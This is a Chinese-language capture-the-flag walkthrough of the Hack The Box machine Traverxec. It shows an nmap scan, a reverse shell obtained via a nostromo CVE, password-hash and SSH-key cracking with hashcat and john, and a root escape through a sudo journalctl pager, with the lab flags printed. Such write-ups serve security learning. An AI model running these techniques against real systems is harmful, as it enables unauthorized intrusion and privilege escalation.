Basic Scan

Nmap Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
~/Documents/HTB/Traverxec root@kali
❯ cat nmap_All.txt
# Nmap 7.80 scan initiated Wed Jan 22 11:07:40 2020 as: nmap -sC -sV -p- -oN nmap_All.txt 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.31s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 22 11:17:38 2020 -- 1 IP address (1 host up) scanned in 598.13 seconds

全端口扫描,没有明奇奇怪怪的端口,SSH也无可利用漏洞,故从80端口入手。

User.txt

CEV Exploit

80端口显示提供http服务的是一个名为nostromo的应用,版本为1.96。 经查证,该本本存在 CVE-2019-16278,下载到本地后,执行reverse shell code,获得Initial Shell

1
2
3
4
5
6
7
8
~/Documents/HTB/Traverxec root@kali
❯ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.165] 41514
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@traverxec:/usr/bin$

Migrate to Hight Privilege

Step1.

有了Shell以后,和平常一样,上传一个检查脚本 [LinEnum.sh] 结果显示在/var/nostromo/conf/目录下存在一个密码。以及用户david。

1
2
3
4
5
...
[-] htpasswd found - could contain passwords:                                                                                                                                                                                              
/var/nostromo/conf/.htpasswd                                                                                                                                                                                                               
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/  
...

用hashcat破解后,密码为Nowonly4me, 尝试过ssh后无果。

继续枚举,在nostromo目录中的conf下内,发现对于该应用的配置文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
cat nhttpd.conf
# MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                    www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www

查看该文件的详细文档后 [http://www.nazgul.ch/dev/nostromo\_man.html\]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
HOMEDIRS
     To serve the home directories of your users via HTTP, enable the homedirs
     option by defining the path in where the home directories are stored,
     normally /home.  To access a users home directory enter a ~ in the URL
     followed by the home directory name like in this example:

           http://www.nazgul.ch/~hacki/

     The content of the home directory is handled exactly the same way as a
     directory in your document root.  If some users don't want that their
     home directory can be accessed via HTTP, they shall remove the world
     readable flag on their home directory and a caller will receive a 403
     Forbidden response.  Also, if basic authentication is enabled, a user can
     create an .htaccess file in his home directory and a caller will need to
     authenticate.

     You can restrict the access within the home directories to a single sub
     directory by defining it via the homedirs_public option.

发现其配置 HOMEDIRS 为/home,且在home下存在用户david。 同时该配置同时也设置david下可供访问的目录名称为public_www

Step2.

进入该目录后,发现名为backup-ssh-identity-files.tgz的压缩文件疑似ssh key。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
www-data@traverxec:/var/nostromo/conf$ cd /home/david/public_www
cd /home/david/public_www
www-data@traverxec:/home/david/public_www$ ls -la
ls -la
total 16
drwxr-xr-x 3 david david 4096 Oct 25 15:45 .
drwx--x--x 5 david david 4096 Jan 22 00:18 ..
-rw-r--r-- 1 david david  402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Oct 25 17:02 protected-file-area
www-data@traverxec:/home/david/public_www$ cd protected-file-area
cd protected-file-area
www-data@traverxec:/home/david/public_www/protected-file-area$ ls -la
ls -la
total 16
drwxr-xr-x 2 david david 4096 Oct 25 17:02 .
drwxr-xr-x 3 david david 4096 Oct 25 15:45 ..
-rw-r--r-- 1 david david   45 Oct 25 15:46 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25 17:02 backup-ssh-identity-files.tgz
www-data@traverxec:/home/david/public_www/protected-file-area$

将其下载至本地后,确实为ssh key,但已用rsa加密,使用john暴力破解。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
~/Documents/HTB/Traverxec root@kali
❯ python /usr/share/john/ssh2john.py id_rsa >id_rsa.john

~/Documents/HTB/Traverxec root@kali
❯ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
1g 0:00:00:06 DONE (2020-01-22 18:05) 0.1506g/s 2159Kp/s 2159Kc/s 2159KC/sa6_123..*7¡Vamos!
Session completed

破解后密码为hunter,使用该密码和密钥登录,获得user.txt

1
2
3
4
5
6
7
8
~/Documents/HTB/Traverxec root@kali
❯ ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Wed Jan 22 00:15:28 2020 from 10.10.14.2
david@traverxec:~$ cat user.txt 
7db0b48469606a42cec20750d9782f3d
david@traverxec:~$

Root.txt

在该用户目录下继续枚举,发现server-stats.sh 在运行时,以 sudo 身份运行 journalctl 。 查看 [GTFO]后,得知该命令可以在生产的交互式shell中逃逸。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
david@traverxec:~$ ls
bin  LinEnum.sh  public_www  user.txt
david@traverxec:~$ cd bin
david@traverxec:~/bin$ ls
server-stats.head  server-stats.sh
david@traverxec:~/bin$ cat server-stats.sh 
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 
david@traverxec:~/bin$

尝试多此无果,直到有老哥提醒说调整terminal的大小可以方便逃逸。 在我调整窗口至命令不能一行显示完全时,逃逸成功。[原因至今未解]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2020-01-21 22:06:45 EST, end at Wed 2020-01-22 05:
Jan 22 04:44:44 traverxec sudo[2726]: pam_unix(sudo:auth): authenticati
Jan 22 04:44:46 traverxec sudo[2726]: pam_unix(sudo:auth): conversation
Jan 22 04:44:46 traverxec sudo[2726]: pam_unix(sudo:auth): auth could n
Jan 22 04:44:46 traverxec sudo[2726]: www-data : command not allowed ; 
Jan 22 04:44:46 traverxec crontab[2783]: (www-data) LIST (www-data)
!/bin/bash
root@traverxec:/home/david/bin# id
uid=0(root) gid=0(root) groups=0(root)
root@traverxec:/home/david/bin# cd
root@traverxec:~# cat root.txt
9aa36a6d76f785dfd320a478f6e0d906
root@traverxec:~#